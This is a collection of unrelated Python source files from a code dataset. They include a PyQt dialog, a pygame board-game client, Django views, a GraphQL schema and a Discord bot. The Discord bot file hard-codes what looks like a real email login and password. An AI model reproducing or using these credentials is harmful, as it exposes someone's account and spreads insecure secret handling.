QtCore.QString(\"Delete '%s' ?\" % (singular)) \n\t\tlabel = QtGui.QLabel(label_str)\n\t\tself.dialog.layout().addRow(label)\n\t\t# spacer \n\t\tspacerItem = QtGui.QSpacerItem(1,20)\n\t\tself.dialog.layout().addItem(spacerItem)\n\t\t# ok \n\t\tbutton = QtGui.QPushButton(\"ok\",self)\n\t\tbutton.setFixedWidth(300)\n\t\tbutton.pressed.connect(lambda arg = submit_dict : self.clickDialogButton(arg))\n\t\tself.dialog.layout().addRow(button)\n\t\t# modal \n\t\tself.dialog.exec_()\n\tdef clickDialogButton(self,submit_dict):\n\t\t# get form content\n\t\tif submit_dict[\"mode\"] == \"new\" or submit_dict[\"mode\"] == \"edit\":\n\t\t\tdialog_content_dict = {\n\t\t\t\t\"singular\" : self.singular_edit.text().toUtf8().replace(\"'\",\"\\\\'\"),\n\t\t\t\t\"plural\" : self.plural_edit.text().toUtf8().replace(\"'\",\"\\\\'\"),\n\t\t\t\t\"environments\" : self.environments_edit.text().toUtf8().replace(\"'\",\"\\\\'\"),\n\t\t\t}\n\t\t# check mode\n\t\tif submit_dict[\"mode\"] == \"new\":\n\t\t\tself.newCompound(dialog_content_dict)\n\t\telif submit_dict[\"mode\"] == \"edit\":\n\t\t\tself.editCompound(submit_dict,dialog_content_dict)\n\t\telif submit_dict[\"mode\"] == \"delete\":\n\t\t\tself.deleteCompound(submit_dict)\n\t\t# close dialog\n\t\tself.dialog.close()\n\tdef newCompound(self,dialog_content_dict):\n\t\t# get publication id\n\t\tpublication_id = self.getNextId()\n\t\t# new \n\t\tquery_list = {\n\t\t\t\"database\" : \"nlp\",\n\t\t\t\"query_type\" : \"INSERT\",\n\t\t\t\"table\" : \"compounds\",\n\t\t\t\"id\" : publication_id,\n\t\t}\n\t\tQueries(query_list)\n\t\t# add dialog content\n\t\tvalues_list = {\n\t\t\t\"singular\" : dialog_content_dict[\"singular\"],\n\t\t\t\"plural\" : dialog_content_dict[\"plural\"],\n\t\t\t\"environments\" : dialog_content_dict[\"environments\"],\n\t\t}\n\t\tquery_list = {\n\t\t\t\"database\" : \"nlp\",\n\t\t\t\"query_type\" : \"UPDATE\",\n\t\t\t\"table\" : \"compounds\",\n\t\t\t\"id\" : publication_id,\n\t\t\t\"values_list\" : values_list\n\t\t}\n\t\tQueries(query_list)\n\t\t# refresh\n\t\tself.refreshPage()\n\tdef getNextId(self):\n\t\tcolumns_list = {\"id\"}\n\t\tquery_list = {\n\t\t\t\"database\" : \"nlp\",\n\t\t\t\"query_type\" : \"SELECT\",\n\t\t\t\"table\" : \"compounds\",\n\t\t\t\"columns_list\" : columns_list,\n\t\t}\n\t\tcontent = Queries(query_list)\n\t\tresult = content.returnResult()\n\t\tnext_ids_list = [0]\t\t\n\t\tfor next_id in result:\n\t\t\tnext_ids_list.append(int(next_id[0]))\n\t\tfree_next_ids_list = []\n\t\tfor free_next_id in range(1,next_ids_list[-1]+1):\n\t\t\tif free_next_id not in next_ids_list:\n\t\t\t\tfree_next_ids_list.append(free_next_id)\t\n\t\tif not len(free_next_ids_list):\n\t\t\tnext_id = next_ids_list[-1]+1\n\t\telse:\n\t\t\tnext_id = min(free_next_ids_list)\n\t\treturn next_id\t\n\tdef editCompound(self,submit_dict,dialog_content_dict):\n\t\t# dialog content \n\t\tvalues_list = {\n\t\t\t\"singular\" : dialog_content_dict[\"singular\"],\n\t\t\t\"plural\" : dialog_content_dict[\"plural\"],\n\t\t\t\"environments\" : dialog_content_dict[\"environments\"],\n\t\t}\n\t\tquery_list = {\n\t\t\t\"database\" : \"nlp\",\n\t\t\t\"query_type\" : \"UPDATE\",\n\t\t\t\"table\" : \"compounds\",\n\t\t\t\"id\" : submit_dict[\"id\"],\n\t\t\t\"values_list\" : values_list\n\t\t}\n\t\tQueries(query_list)\n\t\t# refresh\n\t\tself.refreshPage()\n\tdef deleteCompound(self,submit_dict):\n\t\tquert_list = {\n\t\t\t\"database\" : \"nlp\",\n\t\t\t\"query_type\" : \"DELETE\",\n\t\t\t\"table\" : \"compounds\",\n\t\t\t\"publication_id\" : submit_dict[\"id\"],\n\t\t}\n\t\tQueries(quert_list)\n\t\t# refresh\n\t\tself.refreshPage()\n\tdef refreshPage(self):\n\t\tself.window().clearLayout()\n\t\tself.window().editCompounds()\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"EditCompounds.py","file_name":"EditCompounds.py","file_ext":"py","file_size_in_byte":9220,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"67089599","text":"import csv, glob, os\n\nclass QcMetrics(object):\n\n def __init__(self, dn):\n \"\"\"\n Expectations is a dictionary where the key is a glob\n pattern and the value is the number of files expected to be returned\n \"\"\"\n self.dn = dn\n\n #-- __init__\n\n @staticmethod\n def verifyBamID_bn():\n return \"verify_bam_id.selfSM\"\n\n def verifyBamID_GT_bn():\n return \"GT_verify_bam_id.selfSM\"\n\n def verifyBamID_fn(self):\n bn = QcMetrics.verifyBamID_bn()\n files = glob.glob( os.path.join(self.dn, bn) )\n if len(files) == 1: return files[0]\n bn_gt = QcMetrics.verifyBamID_GT_bn()\n files = glob.glob( os.path.join(self.dn, bn_gt) )\n if len(files) == 1: return files[0]\n raise FileNotFoundError(\"Failed to find verify bam id file ({} or {}) in {}\".format(bn, bn_gt, self.dn))\n\n def verifyBamID_metrics(self):\n fn = self.verifyBamID_fn()\n with open(fn, \"r\") as f:\n rdr = csv.DictReader(f, delimiter=\"\\t\")\n metrics = next(rdr)\n if metrics is None:\n raise Exception(\"Failed to find Verify BamID metrics in {}\".format(fn))\n return metrics\n\n #-- verifyBamID\n\n @staticmethod\n def picard_wgs_bn():\n return \"wgs_metric_summary.txt\"\n\n def picard_wgs_fn(self):\n bn = QcMetrics.picard_wgs_bn()\n files = glob.glob( os.path.join(self.dn, bn) )\n if len(files) == 1: return files[0]\n raise FileNotFoundError(\"Failed to find picard wgs ({}) in {}\".format(bn, self.dn))\n\n def picard_wgs_metrics(self):\n fn = self.picard_wgs_fn()\n with open(fn, \"r\") as f:\n for l in f:\n if l.rstrip() == \"## METRICS CLASS\\tpicard.analysis.CollectWgsMetrics$WgsMetrics\":\n break\n rdr = csv.DictReader(f, delimiter=\"\\t\")\n metrics = next(rdr)\n if metrics is None:\n raise Exception(\"Failed to find Picard WGS metrics in {}\".format(fn))\n return metrics\n\n #-- picard wgs\n\n#-- QcMetrics\n","sub_path":"laims/metrics.py","file_name":"metrics.py","file_ext":"py","file_size_in_byte":2053,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"322835846","text":"from django.urls import path\nfrom .views import (\n dashboard, \n categories, \n course_overview, \n category_single, \n chats,\n instructors,\n students\n)\nurlpatterns = [\n path('', dashboard, name='home'),\n path('courses/', course_overview, name='courses'),\n path('categories/', categories, name='categories' ),\n path('category/', category_single, name=\"category\"),\n path('chats/', chats, name=\"chats\"),\n path('students/', students, name=\"students\"),\n path('instructors/', instructors, name=\"instructors\"),\n \n]","sub_path":"src/dashboard/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":547,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"547533532","text":"import pygame\nfrom pygame.locals import *\nimport wx\nimport sys\nimport traceback\nimport time\nimport socket\nimport threading\nimport json\nfrom AI import *\npygame.init()\n\n# 游戏参数\nblueSide = 1\nredSide = 0\nPlayer = redSide # 红方先走\nredScore = 0\nblueScore = 0\nFPS = 50 # 刷新速率\ncanRedStop = False\ncanBlueStop = False\n# todo\nselectedPiecesBefore = None\nisSelectedBefore = False\n\n# 状态参数\ngameState = 0\n\n'''\n0 - 未开始游戏\n1 - 开始游戏\n3 - 连接失败\n4 - 对方叫停\n7 - 对方超时\n8 - 我方超时\n9 - 我方退出游戏\n10 - 对方退出游戏\n11 - 我方叫停\n'''\n\n# 网络参数\nSERVER_IP = '127.0.0.1'\nuserName = 'yan'\nPORT = 50005\nclock = pygame.time.Clock()\n\n# 对战参数\nSide = None\ngame_ID = None\ncounterPartName = None\nsrc_Pos = None\ndst_Pos = None\nexp = None\nnumber = None\neventSide = None\n\n# 字体与颜色\nfont_30 = pygame.font.SysFont('consolas', 30)\nfont_Arial_28 = pygame.font.SysFont('arial', 28)\nWHITE = [255, 255, 255]\nBLACK = [0, 0, 0]\nRED = [255, 0, 0]\nBLUE = [0, 0, 238]\nVIOLET = [160, 32, 240]\nYELLOW = [255, 255, 0]\nGRAY = [211, 211, 211]\nORANGE = [255, 127, 0]\n\nBLUE_HOME = [[0, 7], [3, 10], [3, 6], [3, 8], [3, 4], [2, 5], [2, 7], [2, 9], [1, 8], [1, 6]]\nRED_HOME = [[14, 7], [11, 4], [11, 8], [11, 6], [11, 10], [12, 9], [12, 7], [12, 5], [13, 6], [13, 8]]\nCHESSBOARD = [\n [1, 1, 1, 1, 1, 1, 1, 0, 1, 1, 1, 1, 1, 1, 1],\n [1, 1, 1, 1, 1, 1, 0, 1, 0, 1, 1, 1, 1, 1, 1],\n [1, 1, 1, 1, 1, 0, 1, 0, 1, 0, 1, 1, 1, 1, 1],\n [1, 1, 1, 1, 0, 1, 0, 1, 0, 1, 0, 1, 1, 1, 1],\n [1, 1, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 1, 1],\n [1, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 1],\n [1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1],\n [0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0],\n [1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1],\n [1, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 1],\n [1, 1, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 1, 1],\n [1, 1, 1, 1, 0, 1, 0, 1, 0, 1, 0, 1, 1, 1, 1],\n [1, 1, 1, 1, 1, 0, 1, 0, 1, 0, 1, 1, 1, 1, 1],\n [1, 1, 1, 1, 1, 1, 0, 1, 0, 1, 1, 1, 1, 1, 1],\n [1, 1, 1, 1, 1, 1, 1, 0, 1, 1, 1, 1, 1, 1, 1]]\n\n\nclass CHESS:\n def __init__(self, number, role, pos, index):\n self.position = x, y = pos\n self.realpos = (x + 1) * 60, (y + 1) * 40\n self.number = number\n self.role = role\n self.index = index\n\n\nChessList = []\nLINE = []\n\n\n# 添加线条\ndef initLine():\n global LINE\n for i in range(8):\n temp1 = [((i + 1) * 60, (8 + i) * 40), ((8 + i) * 60, (i + 1) * 40)]\n temp2 = [((i + 1) * 60, (8 - i) * 40), ((i + 8) * 60, (15 - i) * 40)]\n LINE.append(temp1)\n LINE.append(temp2)\n if i != 0:\n temp3 = [((i + 1) * 60, (8 - i) * 40), ((i + 1) * 60, (8 + i) * 40)]\n LINE.append(temp3)\n for i in range(6):\n temp4 = [((i + 9) * 60, (i + 2) * 40), ((i + 9) * 60, (14 - i) * 40)]\n LINE.append(temp4)\n\n\n# 初始化棋子\ndef initPieces():\n ChessList.append(CHESS(0, blueSide, [0, 7], 0))\n ChessList.append(CHESS(1, blueSide, [3, 10], 1))\n ChessList.append(CHESS(2, blueSide, [3, 6], 2))\n ChessList.append(CHESS(3, blueSide, [3, 8], 3))\n ChessList.append(CHESS(4, blueSide, [3, 4], 4))\n ChessList.append(CHESS(5, blueSide, [2, 5], 5))\n ChessList.append(CHESS(6, blueSide, [2, 7], 6))\n ChessList.append(CHESS(7, blueSide, [2, 9], 7))\n ChessList.append(CHESS(8, blueSide, [1, 8], 8))\n ChessList.append(CHESS(9, blueSide, [1, 6], 9))\n ChessList.append(CHESS(0, redSide, [14, 7], 10))\n ChessList.append(CHESS(1, redSide, [11, 4], 11))\n ChessList.append(CHESS(2, redSide, [11, 8], 12))\n ChessList.append(CHESS(3, redSide, [11, 6], 13))\n ChessList.append(CHESS(4, redSide, [11, 10], 14))\n ChessList.append(CHESS(5, redSide, [12, 9], 15))\n ChessList.append(CHESS(6, redSide, [12, 7], 16))\n ChessList.append(CHESS(7, redSide, [12, 5], 17))\n ChessList.append(CHESS(8, redSide, [13, 6], 18))\n ChessList.append(CHESS(9, redSide, [13, 8], 19))\n\n\ndef INIT():\n initLine()\n initPieces()\n\n\n# 给出位置判断是否有棋子 返回值为bool 和 CHESS 类\ndef findPointbyPos(pos):\n global ChessList\n for chess in ChessList:\n if chess.position == pos:\n return True, chess\n return False, None\n\n\n# 给出当前鼠标点击的坐标 返回值为bool 和 x ,y\ndef getPos(event):\n global CHESSBOARD\n for i in range(15):\n for j in range(15):\n if CHESSBOARD[i][j] == 0 and (event.pos[0] - (i + 1) * 60) ** 2 + (event.pos[1] - (j + 1) * 40) ** 2 <= 18 ** 2:\n return True, i, j\n return False, None, None\n\n\n# 计算得分\ndef calculateScore():\n global blueScore, redScore\n blueScore = 0\n redScore = 0\n for i in range(10):\n if ChessList[i].position in RED_HOME:\n blueScore = blueScore + ChessList[i].number * RED_HOME.index(ChessList[i].position)\n if ChessList[i + 10].position in BLUE_HOME:\n redScore = redScore + ChessList[i + 10].number * BLUE_HOME.index(ChessList[i + 10].position)\n # 计算得分函数\n\n\ndef paintBackGround(screen):\n global canBlueStop, canRedStop, Side, font_30, isSelectedBefore, selectedPiecesBefore, blueScore, redScore\n global src_Pos, dst_Pos\n\n # 背景与标题\n pan_img = pygame.image.load('./pic/th.png').convert()\n screen.blit(pan_img, (0, 0))\n pygame.display.set_caption(\"国际数棋_AI版\")\n # 位置圆\n for i in range(15):\n for j in range(15):\n if CHESSBOARD[i][j] == 0:\n pygame.draw.circle(screen, WHITE, [(i + 1) * 60, (j + 1) * 40], 18, 0)\n # 连接线\n for line in LINE:\n pygame.draw.aaline(screen, WHITE, line[0], line[1], 30)\n # 棋底数字\n for i in range(10):\n text = font_Arial_28.render(str(i), True, BLUE)\n text1 = font_Arial_28.render(str(i), True, RED)\n screen.blit(text, ((BLUE_HOME[i][0] + 1) * 60 - 7, (BLUE_HOME[i][1] + 1) * 40 - 15))\n screen.blit(text1, ((RED_HOME[i][0] + 1) * 60 - 7, (RED_HOME[i][1] + 1) * 40 - 15))\n\n # 退出与退出框\n text = font_30.render('QUIT', True, BLACK, WHITE)\n screen.blit(text, (850, 10))\n pygame.draw.rect(screen, BLACK, (849, 9, 71, 32), 3)\n\n # 计分板\n text1 = font_30.render('BlueScore: ' + str(blueScore), True, BLUE)\n screen.blit(text1, (5, 10))\n text2 = font_30.render('RedScore : ' + str(redScore), True, RED)\n screen.blit(text2, (5, 48))\n # 执棋方\n if Side == None or Player == None:\n pass\n else:\n if Player == Side:\n text3 = font_Arial_28.render('YOU NOW !', True, VIOLET)\n pygame.draw.rect(screen, VIOLET, ((749, 78, 160, 32)), 2)\n screen.blit(text3, (750, 80))\n elif Player != Side:\n text3 = font_Arial_28.render('NOT YOU NOW !', True, VIOLET)\n pygame.draw.rect(screen, VIOLET, ((728, 78, 228, 32)), 2)\n screen.blit(text3, (730, 80))\n else:\n pass\n # 下棋方\n if Side == 0:\n text = font_Arial_28.render('You ARE the RED', True, ORANGE)\n else:\n text = font_Arial_28.render('You ARE the BLUE', True, ORANGE)\n screen.blit(text, (5, 82))\n\n # 棋子框\n if src_Pos and dst_Pos and Player != Side:\n pygame.draw.rect(screen, YELLOW, ((src_Pos[0] + 1) * 60 - 20, (src_Pos[1] + 1) * 40 - 20, 39, 39), 2)\n pygame.draw.rect(screen, YELLOW, ((dst_Pos[0] + 1) * 60 - 20, (dst_Pos[1] + 1) * 40 - 20, 39, 39), 2)\n\n return True\n\n\n# 绘制棋子\ndef paintpieces(screen):\n global ChessList\n\n for CHESS in ChessList:\n img1 = pygame.image.load('./pic/' + str(CHESS.role) + str(CHESS.number) + '.png').convert()\n img2 = pygame.Surface((36, 36))\n pygame.transform.scale(img1, (36, 36), img2)\n screen.blit(img2, ((CHESS.position[0] + 1) * 60 - 18, (CHESS.position[1] + 1) * 40 - 18))\n\n\ndef isStop():\n global canBlueStop, canRedStop\n\n num_b = 0 # 已到达的蓝色棋子数\n num_r = 0 # 已到达的红色棋子数\n for i in range(10):\n if ChessList[i].position in RED_HOME:\n num_b += 1\n if ChessList[i + 10].position in BLUE_HOME:\n num_r += 1\n if num_b == 10: # todo\n canBlueStop = True\n if num_r == 10:\n canRedStop = True\n\n\n# 交换棋子坐标,换手\ndef swapHand():\n global Player\n if Player == redSide:\n Player = blueSide\n else:\n Player = redSide\n\n\ndef MoveChess(index, pos):\n ChessList[index].position = pos\n\n\n# 显示提示窗口\ndef showtips(str, title):\n app = wx.App()\n wx.MessageBox(str, title, wx.OK | wx.ICON_INFORMATION)\n\n\n\ndef going_chess():\n global is_Moved, ChessList\n while True:\n if gameState == 1:\n if Side == 0 and number != None:\n if ChessList[number].position == dst_Pos:\n pass\n else:\n MoveChess(number, dst_Pos)\n swapHand()\n isStop()\n calculateScore()\n elif Side == 1 and number != None:\n if ChessList[number + 10].position == dst_Pos:\n pass\n else:\n MoveChess(number + 10, dst_Pos)\n swapHand()\n isStop()\n calculateScore()\n else:\n pass\n else:\n break\n time.sleep(1)\n\n\ndef sendMoveTo(client, nextOp):\n global game_ID, ChessList\n num = ChessList[nextOp[0]].number\n src = nextOp[1]\n dst = nextOp[2]\n exp = nextOp[3]\n msg = {\n \"type\": 1,\n \"msg\": {\"game_id\": game_ID, \"side\": Side, \"num\": num,\n \"src\": {\"x\": src[0], \"y\": src[1]},\n \"dst\": {\"x\": dst[0], \"y\": dst[1]},\n \"exp\": exp\n }\n }\n client.send(json.dumps(msg).encode('utf-8'))\n\n\ndef recvMsg():\n global gameState, game_ID, counterpart_name, Side, src_Pos, dst_Pos, exp, number, eventSide, client, is_Moved, ChessList, SERVER_IP\n gameState = 1\n\n try:\n client = socket.socket()\n client.connect((SERVER_IP, PORT))\n send_msg = {\"type\": 0, \"msg\": {\"name\": userName}}\n client.send(json.dumps(send_msg).encode('utf-8'))\n t1 = threading.Thread(target=going_chess)\n t1.setDaemon(True)\n t1.start()\n except:\n traceback.print_exc()\n showtips('连接失败,请检查IP输入是否正确!', '错 误')\n gameState = 3\n\n while gameState == 1:\n try:\n msg = json.loads(client.recv(2048).decode('utf-8'))\n print(344, msg)\n except:\n msg = None\n gameState = 0\n if msg == None:\n continue\n if 'status' not in msg and 'num' in msg: # 走棋消息\n number = msg['num']\n src_Pos = [msg['src']['x'], msg['src']['y']]\n dst_Pos = [msg['dst']['x'], msg['dst']['y']]\n exp = msg['exp']\n continue\n if 'status' in msg and msg['status'] == 1: # 匹配消息\n game_ID = msg['game_id']\n counterpart_name = msg['counterpart_name']\n Side = msg['side']\n continue\n elif 'status' in msg and msg['status'] == 2: # 退出或叫停\n if msg['request'] == 'stop':\n if msg['side'] == Side:\n gameState = 11\n else:\n gameState = 4\n elif msg['request'] == 'quit':\n if msg['side'] == Side:\n gameState = 9\n else:\n gameState = 10\n sendmsg = {\"type\": 3, \"side\": Side}\n client.send(json.dumps(sendmsg).encode('utf-8'))\n client.close()\n break\n elif 'status' in msg and msg['status'] == 3: # 超时\n if msg['side'] == Side:\n gameState = 8\n else:\n gameState = 7\n sendmsg = {\"type\": 3, \"side\": Side}\n client.send(json.dumps(sendmsg).encode('utf-8'))\n client.close()\n break\n if client == None:\n gameState = 0\n\n\ndef judgeWin():\n global blueScore, redScore\n if blueScore > redScore:\n showtips('游戏结束,蓝方胜利 !', 'Congratulations')\n elif blueScore == redScore:\n showtips('游戏结束,双方平局 !', 'Congratulations')\n else:\n showtips('游戏结束,红方胜利 !', 'Congratulations')\n\ndef goingchessbyai():\n while gameState == 1:\n if Player == Side:\n nextOp = maxMinSearch(State(ChessList, None), Side)\n print(nextOp)\n sendMoveTo(client, nextOp)\n MoveChess(nextOp[0], nextOp[2])\n swapHand()\n calculateScore()\n else:\n time.sleep(1)\n continue\n\n\n\ndef main():\n global selectedPiecesBefore, isSelectedBefore, gameState, client, game_ID, ChessList, canRedStop, canBlueStop\n screen = pygame.display.set_mode([960, 640])\n INIT() # 初始化棋子与线条\n\n t2 = threading.Thread(target=recvMsg)\n t2.setDaemon(True)\n t2.start()\n\n t3 = threading.Thread(target=goingchessbyai)\n t3.setDaemon(True)\n t3.start()\n\n while True:\n clock.tick(FPS)\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n gameState = 9\n break\n if event.type == MOUSEBUTTONDOWN:\n if event.button == 1 and event.pos[0] >= 850 and event.pos[0] <= 930 and event.pos[1] >= 10 and event.pos[1] <= 42:# 退出\n gameState = 9\n break\n else:\n pass\n\n isStop()\n calculateScore()\n if (Side == 0 and canRedStop) or (Side == 1 and canBlueStop):\n gameState = 11\n\n\n if gameState == 1:\n paintBackGround(screen)\n paintpieces(screen)\n elif gameState == 3:\n break\n elif gameState == 4:\n judgeWin()\n break\n elif gameState == 7:\n showtips('对方超时,YOU WIN !!', 'Congratulations')\n break\n elif gameState == 8:\n showtips('我方超时,YOU LOSS !!', 'QAQ')\n break\n elif gameState == 9:\n showtips('您已退出游戏', '0.0')\n msg = {\"type\": 2, \"msg\": {\"request\": \"quit\", \"game_id\": game_ID, \"side\": Side}}\n client.send(json.dumps(msg).encode('utf-8'))\n break\n elif gameState == 10:\n showtips('对方已退出游戏, YOU WIN !!', '0.0')\n break\n elif gameState == 11:\n judgeWin()\n msg = {\"type\": 2, \"msg\": {\"request\": \"stop\", \"game_id\": game_ID, \"side\": Side}}\n client.send(json.dumps(msg).encode('utf-8'))\n break\n else:\n pass\n\n pygame.display.flip()\n\n client.close()\n pygame.quit()\n sys.exit()\n\n\nif __name__ == '__main__':\n try:\n main()\n except SystemExit:\n print(\"游戏正常退出\")\n except:\n print(\"游戏退出异常\")\n traceback.print_exc()\n pygame.quit()\n sys.exit()\n input()\n","sub_path":"tempAI.py","file_name":"tempAI.py","file_ext":"py","file_size_in_byte":15203,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"463903776","text":"import os\n\nfrom idlewild.schematools import (\n parse_and_build_idl_file,\n setup_logging\n)\n\nfrom .fixtures import (\n get_hero,\n get_human,\n get_droid,\n get_friends,\n update_character,\n)\n\nsetup_logging()\n\ndatafetchers = {\n 'human': lambda human, info, **args: get_human(args['id']),\n 'droid': lambda droid, info, **args: get_droid(args['id']),\n 'hero': lambda root, info, **args: get_hero(args.get('episode')),\n 'friends': lambda character, *_: get_friends(character),\n 'updateCharacterName': lambda hero, info, **args: update_character(\n args['id'], args['newName']\n ),\n}\n\ninterface_resolvers = {\n 'Character': lambda character, info: (\n 'Human' if get_human(character.id) else 'Droid'\n )\n}\n\n# Load the file\n__location__ = os.path.realpath(\n os.path.join(os.getcwd(), os.path.dirname(__file__)))\n\n# Build the schema\nschema = parse_and_build_idl_file(\n os.path.join(__location__, 'starwars.graphqls'),\n resolver_mappings=datafetchers,\n interface_resolver_mappings=interface_resolvers,\n)\n\nStarWarsSchema = schema\n","sub_path":"tests/mutations/starwars_mutation_schema.py","file_name":"starwars_mutation_schema.py","file_ext":"py","file_size_in_byte":1082,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"374465408","text":"#! /usr/bin/env python3\n\n# write a python program to get a comma separated sequence of words, sort them\n# then print them separated by commas\n\n# get input from user -- keep asking until we get a comma separated list\ngood_input = False\nwhile good_input == False:\n usr_input = input(\"Enter a list of words separated by a comma: \")\n if ',' in usr_input:\n good_input = True\n else:\n print(\"I said separated by a comma...please try again\")\n\n\n# split words by ',' delimiter\nwords = usr_input.split(',')\n\n# sort list\nsorted_words = sorted(words)\n\n# print new sorted list using ',' as a delimiter\nprint(\",\".join(sorted_words))","sub_path":"source/lesson3/ice_3_2a.py","file_name":"ice_3_2a.py","file_ext":"py","file_size_in_byte":640,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"338781602","text":"import os\nimport subprocess\n\nimport click\n\nfrom .values import HelmValues\n\n\ndef git_repo_root():\n return subprocess.check_output([\"git\", \"rev-parse\", \"--show-toplevel\"]).decode(\"utf-8\").strip()\n\n\nCLI_HELP = \"\"\"Tools to help generate the schema file for the Dagster Helm chart.\n\"\"\"\n\n\n@click.group(help=CLI_HELP)\ndef cli():\n pass\n\n\n@cli.command()\n@click.option(\n \"--command\", type=click.Choice([\"show\", \"apply\"], case_sensitive=False), default=\"show\"\n)\ndef schema(command):\n \"\"\"Generates the `values.schema.json` file according to user specified pydantic models.\n\n By default, the schema is printed on the console. If the schema is as expected, use\n `--command=apply` to save the changes on the existing `values.schema.json`.\n \"\"\"\n schema_json = HelmValues.schema_json(indent=4)\n\n if command == \"show\":\n click.echo(schema_json, nl=False)\n elif command == \"apply\":\n values_schema_path = os.path.join(git_repo_root(), \"helm/dagster/values.schema.json\")\n with open(values_schema_path, \"w\") as f:\n f.write(schema_json)\n\n\ndef main():\n click_cli = click.CommandCollection(sources=[cli], help=CLI_HELP)\n click_cli()\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"helm/dagster/schema/schema/cli.py","file_name":"cli.py","file_ext":"py","file_size_in_byte":1215,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"94125761","text":"import discord\nfrom discord.ext import commands\n\ndescription = \"\"\"A utility bot for Chronicles of Darkness/New World of Darkness tabletops.\"\"\"\nbot = commands.Bot(command_prefix=\"/\", description=description)\n\nextensions = [\n \"cogs.characters\"\n]\n\n@bot.event\nasync def on_ready():\n \"\"\" Outputs username and id of bot. Attempts to load extensions. \"\"\"\n print(\"Logged in as\")\n print(bot.user.name)\n print(bot.user.id)\n print(\"------\")\n\n # Attempt to load cogs\n for extension in extensions:\n try:\n bot.load_extension(extension)\n except Exception as e:\n exc = '{}: {}'.format(type(e).__name__, e)\n print('Failed to load extension {}\\n{}'.format(extension, exc))\n\n@bot.command()\nasync def adds(left : int, right : int):\n \"\"\"Adds two numbers together.\"\"\"\n await bot.say(left + right)\n\nbot.run(\"kalynisanerd+chronicler@gmail.com\", \"Echidna5\")","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":909,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"247734907","text":"from tkinter import *\nimport requests\n\nURl = \"https://api.kanye.rest\"\n\n\ndef get_quote():\n\n response = requests.get(\"https://api.kanye.rest\")\n if response.status_code == 200:\n quote_dict = response.json()\n quote = quote_dict[\"quote\"]\n canvas.itemconfig(quote_text,text =quote)\n\n\n\nwindow = Tk()\nwindow.title(\"Kanye Says...\")\nwindow.config(padx=50, pady=50)\n\n\ncanvas = Canvas(width=300, height=414)\nbackground_img = PhotoImage(file=\"background.png\")\ncanvas.create_image(150, 207, image=background_img)\nquote_text = canvas.create_text(150, 207, text=\"Kanye Quote Goes HERE\", width=250, font=(\"Arial\", 20, \"bold\"), fill=\"white\")\ncanvas.grid(row=0, column=0)\nget_quote()\n\nkanye_img = PhotoImage(file=\"kanye.png\")\nkanye_button = Button(image=kanye_img, highlightthickness=0, borderwidth=0, command=get_quote)\nkanye_button.grid(row=1, column=0)\n\n\n\nwindow.mainloop()","sub_path":"Day33/Kanye_quotes/kanye_quote_main.py","file_name":"kanye_quote_main.py","file_ext":"py","file_size_in_byte":884,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"255181163","text":"from django.db import transaction\nfrom rest_framework.decorators import action\nfrom rest_framework import status\n\nfrom core.views import APIAuthViewSet, APIViewException\nfrom do_with.models import Group, GroupUser\nfrom do_with.serializers import GroupSerializer, GroupUserSerializer\n\nclass GroupViewSet(APIAuthViewSet):\n queryset = Group.objects.all()\n serializer_class = GroupSerializer\n auth_required_actions = '__all__'\n\n def list(self, request):\n \"\"\"\n GET\n /groups\n \"\"\"\n groups = self.get_queryset().filter(user_id=request.user.id)\n serializer = self.get_serializer(groups, many=True)\n\n return self.get_response(data=serializer.data)\n\n def create(self, request):\n self.json_data['user_id'] = request.user.id\n group_serializer = self.get_serializer(data=self.json_data)\n\n if not group_serializer.is_valid():\n raise APIViewException(error=group_serializer.errors)\n\n group_serializer.save()\n group = group_serializer.data\n group_user = {\"user_id\": request.user.id, \"group_id\": group.get('id'), \"status\": 'APPROVED'}\n group_user_serializer = GroupUserSerializer(data=group_user)\n\n if not group_user_serializer.is_valid():\n raise APIViewException(error=group_user_serializer.errors)\n\n group_user_serializer.save()\n\n return self.get_response(status.HTTP_201_CREATED, data={'group': group_serializer.data, 'group_user': group_user_serializer.data})\n\n def update(self, request, pk=None):\n \"\"\"\n /groups/:pk\n \"\"\"\n group = self.get_object()\n serializer = self.get_serializer(group, data=self.json_data, partial=True)\n\n if not serializer.is_valid():\n raise APIViewException(error=serializer.errors)\n\n serializer.save()\n return self.get_response(status.HTTP_201_CREATED, data=serializer.data)\n\n @transaction.atomic\n @action(methods=['put'], detail=True)\n def image(self, request, pk=None):\n \"\"\"\n /groups/image/:pk\n \"\"\"\n user_id = request.user.id\n try:\n group = Group.objects.get(id=pk)\n except:\n raise APIViewException(status=status.HTTP_404_NOT_FOUND)\n\n if group.user_id != user_id:\n return self.get_response(status=status.HTTP_401_UNAUTHORIZED)\n\n try:\n image = request.data.get('file')\n except:\n raise APIViewException(status=status.HTTP_400_BAD_REQUEST)\n\n serializer = self.get_serializer(group, {'profile_image': image}, partial=True)\n if not serializer.is_valid():\n raise APIViewException(error=serializer.errors)\n\n serializer.save()\n return self.get_response(data=serializer.data, 